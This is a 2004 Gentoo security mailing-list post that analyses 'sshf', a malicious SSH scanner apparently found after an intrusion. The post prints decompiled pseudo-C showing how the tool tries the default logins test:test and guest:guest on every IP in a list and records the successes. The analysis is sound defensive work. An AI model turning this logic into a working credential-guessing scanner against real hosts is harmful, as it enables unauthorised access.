| 1 |
Le Thu, 29 Jul 2004 15:29:23 -0700, Alex Schultz <aschultz@××××××××.com> a |
| 2 |
écrit: |
| 3 |
|
| 4 |
> I'm not 100% sure, but after a quick look it appears that sshf opens up |
| 5 |
> the uniq.txt and then procedes to connect to every ip using test:test or |
| 6 |
> guest:guest. It then dumps out which of those accounts:ip worked to |
| 7 |
> vuln.txt. Then a person can just go through the vuln.txt and ssh and |
| 8 |
> perform whatever rooting they so choose. |
| 9 |
> |
| 10 |
> I wonder what the "ss" program does. It's got libpcap compiled into it |
| 11 |
> so maybe it's some sort of sniffer and/or ip generator (creates |
| 12 |
> bios.txt?). |
| 13 |
> |
| 14 |
> Br0mGreV wrote: |
| 15 |
> |
| 16 |
>> Hi, |
| 17 |
>> |
| 18 |
>> Does anyone started to reverse-ingineer that damn soft 'sshf'? I'm sure |
| 19 |
>> we can learn some information about the exploit, if we |
| 20 |
>> look at this file. |
| 21 |
>> I'll start that tommorow. Hope to give you some informations from that |
| 22 |
>> soon. |
| 23 |
>> |
| 24 |
>> GD |
| 25 |
>> |
| 26 |
>> -- gentoo-security@g.o mailing list |
| 27 |
>> |
| 28 |
>> |
| 29 |
> |
| 30 |
> |
| 31 |
> -- |
| 32 |
> gentoo-security@g.o mailing list |
| 33 |
|
| 34 |
> |
| 35 |
|
| 36 |
|
| 37 |
OK from what i've seen in that prog, it's quite straight forward, i copy |
| 38 |
here a long |
| 39 |
description of what happend, i'm not sure it's really important, but we'll |
| 40 |
see : |
| 41 |
First, the software is linked statically, of course. |
| 42 |
We can found this 4 revelant strings : |
| 43 |
"SSH-2.0-libssh-0.1" |
| 44 |
"**MD5 or whatever** part of openSSL 0.9.d 17 Mar 2004" |
| 45 |
"inflate 1.1.4 Copyright 1995-2002 Mark Adler" |
| 46 |
|
| 47 |
|
| 48 |
main() { |
| 49 |
file=fopen("uniq.txt","r"); |
| 50 |
if (file==NULL){ printf(("nu pot deschide uniq.txt\n"); exit();} |
| 51 |
|
| 52 |
Global_loop: |
| 53 |
fgets (C,0x400,file) |
| 54 |
if (C==0) return(); |
| 55 |
if ((end_of_l=strch (C,0xA))!=NULL) // linefeed |
| 56 |
*(end_of_l)=0; // is substituted by endofstring |
| 57 |
Process=fork(); |
| 58 |
**** |
| 59 |
if (end_of_l!=NULL) { |
| 60 |
ccheckauth(C,"test","test"); |
| 61 |
ccheckauth(C,"guest","guest"); |
| 62 |
} else { |
| 63 |
if(*(nb_proc++)<='2') goto Global_loop; |
| 64 |
while(*(nb_proc)>'2') { wait(Process)}; |
| 65 |
nb_proc--; |
| 66 |
goto Global_loop; |
| 67 |
} |
| 68 |
} |
| 69 |
exit(); |
| 70 |
} |
| 71 |
|
| 72 |
|
| 73 |
and the ccheckauth(host,login,passwd) { |
| 74 |
alarm(0xF); |
| 75 |
options=ssh_getopt(1,"none"); |
| 76 |
options_set_username(options,login); |
| 77 |
option_set_host(options,host) |
| 78 |
|
| 79 |
if((connection=ssh_connect(options))==NULL) return; |
| 80 |
if(ssh_userauth_password(connection,0,passwd)==0) { |
| 81 |
fopen(vuln.txt,"a+"); |
| 82 |
fprintf("%s:%s:%s\n",host,login,passwd); |
| 83 |
printf("GOT IT !! -> %s:%s:%s\n",host,login,passwd); |
| 84 |
} else (ssh_disconnect(connection)); |
| 85 |
return; |
| 86 |
} |
| 87 |
|
| 88 |
|
| 89 |
I assume this program is definitely a not-that-intelligent attack against |
| 90 |
SSH servers, as explained before. |
| 91 |
for all the address in uniq.txt, it test for the stupid login |
| 92 |
"test"-"test" and "guest"-"guest" |
| 93 |
and, that's all. |
| 94 |
|
| 95 |
Don't see anything else. I maybe check ssh functions later, but not sure |
| 96 |
it's necessary. |
| 97 |
If the system is weak enough to include that kind of login, it's possible |
| 98 |
that the root passwd is empty-or-easy-to-guess, and that's explain the |
| 99 |
attack is leaded from root account. |
| 100 |
Another hypothesis is the first compromised computer wasn't exploited that |
| 101 |
way. |
| 102 |
And when he performs that first attack, he doesn't find any SSH server to |
| 103 |
exploit and abord. |
| 104 |
|
| 105 |
Have a good night && sweet dreams if needed, it's late there in France ;) |
| 106 |
|
| 107 |
|
| 108 |
-- |
| 109 |
gentoo-security@g.o mailing list |
Archives